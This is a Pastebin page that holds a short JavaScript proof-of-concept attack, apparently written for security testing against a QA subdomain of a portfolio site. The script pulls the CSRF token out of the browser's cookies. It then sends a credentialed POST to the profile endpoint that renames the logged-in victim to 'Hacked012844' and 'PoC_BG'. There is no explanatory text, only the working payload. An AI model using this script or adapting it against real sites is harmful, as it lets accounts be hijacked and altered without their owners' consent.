Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function getCookie(cname) {
- var name = cname + "=";
- var decodedCookie = decodeURIComponent(document.cookie);
- var ca = decodedCookie.split(';');
- for(var i = 0; i <ca.length; i++) {
- var c = ca[i];
- while (c.charAt(0) == ' ') {
- c = c.substring(1);
- }
- if (c.indexOf(name) == 0) {
- return c.substring(name.length, c.length);
- }
- }
- return "";
- }
- //alert(getCookie("pf-web-csrf-qa"));
- var xmlHttp = new XMLHttpRequest();
- xmlHttp.open("POST", "https://qa.portfolium.com/proxy/users/profile", true);
- xmlHttp.withCredentials = true
- xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
- xmlHttp.send("username=Hacked012844&lastname=PoC_BG&firstname=PoC_BG&csrf_token=" + getCookie("pf-web-csrf-qa"));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement